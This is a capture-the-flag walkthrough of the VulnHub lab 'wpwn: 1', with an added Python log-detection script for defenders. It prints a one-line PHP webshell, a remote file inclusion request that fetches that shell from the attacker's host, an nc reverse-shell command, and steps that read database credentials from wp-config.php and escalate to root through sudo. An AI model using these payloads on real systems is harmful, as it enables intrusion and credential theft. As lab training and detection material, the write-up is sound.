VulnHub: wpwn: 1

Today we will take a look at VulnHub: wpwn: 1. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
sudo nmap -p- -sCV --open 192.168.213.123
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster
gobuster dir -u http://192.168.213.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.213.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/05 18:50:16 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 322]
  • Wpscan
wpscan --url http://192.168.213.123/wordpress
  • Reverse Shell
Command: nano exploit.php
<pre>system($_GET[rce])</pre>
Command: curl 'http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=id&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php'
http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=nc%20-e%20/bin/bash%20Your_IP%204242&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php # Change IP
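
For defenders, the requests above leave a recognisable trace in the web server's access log. The following Python script is an added example, not part of the original writeup: it flags admin-post.php requests that combine swp_debug=load_options with an swp_url value. The log lines are constructed samples in Apache combined format, and the function name is hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not taken from the target host).
SAMPLE_LOG = """\
192.168.49.213 - - [05/Jun/2022:18:55:01 +0000] "GET /wordpress/wp-admin/admin-post.php?rce=id&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php HTTP/1.1" 200 512 "-" "curl/7.82.0"
192.168.49.213 - - [05/Jun/2022:18:55:40 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2F192.168.49.213%3A1337%2Fexploit.php HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Jun/2022:18:56:02 +0000] "POST /wordpress/wp-admin/admin-post.php?action=save_form HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Jun/2022:18:56:10 +0000] "GET /wordpress/?s=swp_url HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_remote_option_loads(log_text):
    """Return one dict per request that asks admin-post.php to load options from a URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m is None:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin-post.php"):
            continue
        params = parse_qs(url.query)  # parse_qs percent-decodes, so encoded URLs match too
        if "load_options" not in params.get("swp_debug", []):
            continue
        for remote in params.get("swp_url", []):
            hits.append({
                "client": m["ip"],
                "time": m["ts"],
                "status": int(m["status"]),
                "fetched_from": remote,
                "remote_host": urlsplit(remote).hostname,
                # Unexpected extra parameters (such as rce above) deserve a closer look.
                "extra_params": sorted(set(params) - {"swp_debug", "swp_url"}),
            })
    return hits

if __name__ == "__main__":
    for hit in find_remote_option_loads(SAMPLE_LOG):
        print(hit)
```

Each hit also names the host the server was told to fetch from, which can be correlated with outbound connections in firewall or proxy logs.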
  • Takis

After login

Command: script /dev/null -c bash
Command: export TERM=xterm
ctrl+z
Command: stty raw -echo ; fg

Command: reset

Takis’s password

We see the password in the wp-config.php file in the /var/www/html/wordpress folder.

Command: cat wp-config.php
Command: su Takis
  • Root
Command: sudo -l
(ALL) NOPASSWD: ALL
Command: sudo su

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.